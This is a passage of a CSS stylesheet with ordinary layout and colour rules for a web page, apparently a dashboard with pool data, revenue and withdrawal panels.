  bottom: 0;
  right: auto;
  display: inline-block;
  height: 0.2rem;
  width: 3rem;
  background-color: #ee0a24;
}
.pool_title {
  display: block;

  padding: 1rem 0;
}

.all_pool_data{
  width: 80%;
  padding:0 5%;
  margin: auto;
  border-radius: 5px;
  box-shadow: 0 1px 15px rgb(188 207 255 / 50%);
}
.all_pool_data h3{
  text-align: left;
  margin-bottom: 10px;
}
.pool_data {
  width: 100%;


  display: flex;

  justify-content: space-between;
}

.pool_data ul li {
  text-align: left;
  font-size: 14px;
  padding-left: 12px;
  line-height: 1.5rem;
  color:#a1a1b3;
}

.pool_data ul:last-child li {
  font-weight: bold;
  text-align: right;
  color:#000;
}
.pool_data2 {
  display: block;
}
.Output_title {
  width: 100%;
  font-size: 0.6rem;
  display: flex;
  justify-content: space-between;
}
.Output_title div {
  font-size: 0.6rem;
}

.kfxts {
  position: fixed;
  top: 30%;
  right: 0;
  width: 3rem;
  height: 3rem;
  right: 5%;
}
.kfxts img {
  display: block;
  width: 3rem;
  height: 3rem;
  margin-bottom: 1rem;
}
.revenue {
  width: 80%;
  margin: auto;
  padding: 5%;
  box-shadow: 0 1px 15px rgb(188 207 255 / 50%);
}
.revenue ul {
  width: 90%;
  margin: auto;
  display: flex;
  flex-direction: row;
  justify-content: space-between;
}
.revenue ul li {
  width: 30%;
  height: 1rem;
  overflow: hidden;
  margin-top: 1rem;
  font-size: 0.6rem;
  text-align: center;
}
.Withdrawal {
  width: 80%;
  padding: 3%;
  border-radius: 15px;
  box-shadow: 0 1px 15px rgb(188 207 255 / 50%);
}

.Withdrawal .btns {
  margin: 10px 10px 0px 0px;
  height: 36px;
}
.popup {
  padding: 10vw 2vw;
  border-radius: 25px;
}
.popup div span {
  margin: 2vw 0 3vw 0;
  display: block;
  color: red;
}

.leftIcon{
  display: inline-block;
    position: relative;
    top: 0;
    left: 0;
    bottom: 0;
    margin: auto;
    width: 5px;
    height: 15px;
    border-radius: 2px;
    margin-right: 10px;
    background: linear-gradient(1turn, rgba(90, 71, 217, .09), #71a8e0);
}
</style>
